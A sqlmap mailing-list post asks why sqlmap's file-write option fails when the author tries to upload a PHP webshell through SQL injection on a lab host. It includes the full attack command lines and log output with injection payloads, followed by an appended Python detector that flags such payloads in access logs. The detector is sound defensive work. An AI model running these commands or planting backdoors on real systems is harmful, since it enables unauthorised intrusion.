Hello Everyone,

I'm attempting to use sqlmap to exploit a local installation of some
software.  I know it's vulnerable because it's on exploit-db & metasploit
pops it every time (http://www.exploit-db.com/exploits/20501/).  I've had
limited success with sqlmap, but I'm at the final stage now where I'm
trying to use the SQLi's I've found to upload a webshell via sqlmap.  No
dice... I'm getting an error stating "[ERROR] none of the SQL injection
techniques detected can be used to write files to the underlying file
system of the back-end MySQL server."  Other than the obvious, I'm not sure
what this means because --os-shell and --os-cmd upload a file and execute
just fine.  Does --file-write need something special?  Here's the output:

root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" \
  -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 \
  --file-write /usr/share/webshells/php/simple-backdoor.php \
  --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3

...
[*] starting at 23:13:08

[23:13:08] [DEBUG] cleaning up configuration parameters
[23:13:08] [DEBUG] setting the HTTP timeout
[23:13:08] [DEBUG] setting the HTTP method to GET
[23:13:08] [DEBUG] creating HTTP requests opener object
[23:13:08] [DEBUG] forcing back-end DBMS to user defined value
[23:13:08] [DEBUG] setting the write file functionality
[23:13:08] [INFO] testing connection to the target URL
[23:13:08] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND
'yVaP'='yVaP&password=admin
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND
'OHln'='OHln&password=admin
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[23:13:08] [INFO] testing MySQL
[23:13:08] [INFO] confirming MySQL
[23:13:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[23:13:08] [INFO] fingerprinting the back-end DBMS operating system
[23:13:08] [INFO] the back-end DBMS operating system is Windows
[23:13:08] [ERROR] none of the SQL injection techniques detected can be
used to write files to the underlying file system of the back-end MySQL
server
[23:13:08] [INFO] fetched data logged to text files under
'/usr/share/sqlmap/output/172.16.71.138'

[*] shutting down at 23:13:08


The results are the same when the cmdline is changed up for a POST version:

root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php" \
  --data='act=auth-login&pag=login&username=admin&password=admin' -p "username" \
  --threads=10 --dbms=mysql --level=6 --risk=3 \
  --file-write /usr/share/webshells/php/simple-backdoor.php \
  --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3

Any thoughts on what may be happening here would be much appreciated.

Thanks,

Brian
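The two payloads sqlmap reported in the output above (a numeric tautology `AND 2011=2011` and a delay `SLEEP(5)`, each followed by a quote-balancing `'x'='x`) are exactly what a defender sees in the web server access log while such a scan runs, and the file primitives that a successful `--file-write` would have to reach (`INTO OUTFILE` / `INTO DUMPFILE`, and `LOAD_FILE` for reads) are equally visible there. As an added example, not part of Brian's message or of sqlmap itself, here is a small Python detector that parses Apache-style access log lines, URL-decodes each query parameter and flags those indicator classes. The log format regex, the client IP, the timestamps and the fourth request (which carries an inert `INTO OUTFILE` string) are constructed for the example; the other three requests are modelled on the ones in the thread.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" access-log line, reduced to the fields this detector uses.
# Constructed for this example; adjust the pattern to your own log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators matched against each URL-decoded parameter value.
# "boolean-blind" and "time-blind" follow the two payload shapes sqlmap
# printed in the thread (a numeric or string tautology, and SLEEP()).
# "file-write" / "file-read" are the MySQL file primitives a file write or
# read through SQL injection has to reach; blind techniques alone cannot
# express them, which is what sqlmap's error message is saying.
INDICATORS = {
    "boolean-blind": re.compile(
        r"\bAND\s+(?:(\d+)\s*=\s*\1\b|'(\w+)'\s*=\s*'\2\b)", re.I),
    "time-blind": re.compile(
        r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I),
    "file-write": re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.I),
    "file-read": re.compile(r"\bLOAD_FILE\s*\(", re.I),
}

# Constructed sample lines: one ordinary login, the two blind payloads from
# the thread, and one request carrying an inert file-write string.
# Client IP and timestamps are made up for the example.
SAMPLE_LOG = [
    '172.16.71.1 - - [01/Jan/2014:23:13:08 -0500] "GET /index.php?act=auth-login'
    '&pag=login&username=admin&password=admin HTTP/1.1" 200 1532',
    '172.16.71.1 - - [01/Jan/2014:23:13:08 -0500] "GET /index.php?act=auth-login'
    '&pag=login&username=admin%27%20AND%202011%3D2011%20AND%20%27yVaP%27%3D%27yVaP'
    '&password=admin HTTP/1.1" 200 1532',
    '172.16.71.1 - - [01/Jan/2014:23:13:13 -0500] "GET /index.php?act=auth-login'
    '&pag=login&username=admin%27%20AND%20SLEEP%285%29%20AND%20%27OHln%27%3D%27OHln'
    '&password=admin HTTP/1.1" 200 1532',
    '172.16.71.1 - - [01/Jan/2014:23:13:14 -0500] "GET /index.php?act=auth-login'
    '&pag=login&username=admin%27%20UNION%20SELECT%20%27x%27%20INTO%20OUTFILE'
    '%20%27C%3A%2Ftmp%2Fx.txt%27--%20-&password=admin HTTP/1.1" 200 1532',
]


def classify_value(value):
    """Return the sorted indicator names that match one decoded parameter value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))


def scan_log(lines):
    """Return one finding per (request, parameter) that carries an indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognised access-log line; skip rather than guess
        _, _, query = m.group("path").partition("?")
        # parse_qsl URL-decodes each value once; blank values are kept so a
        # bare "username=" still appears as a parameter.
        for param, value in parse_qsl(query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                findings.append({
                    "ip": m.group("ip"), "ts": m.group("ts"), "param": param,
                    "status": int(m.group("status")), "indicators": hits,
                })
    return findings


def suspicious_ips(findings, threshold=2):
    """Count findings per client IP; a scanner produces bursts, a typo does not."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"{f['ts']} {f['ip']} param={f['param']} -> {', '.join(f['indicators'])}")
    print("bursting clients:", suspicious_ips(results))
```

Note that the time-based payload is flagged twice: `SLEEP(` trips the time-blind pattern and its trailing `'OHln'='OHln` trips the tautology pattern, which is why the detector reports per parameter rather than per pattern. The per-IP count is what separates a `--threads=10` scan from a single odd-looking request; the threshold and patterns are a starting point to tune against your own traffic, not an exhaustive signature set.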
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users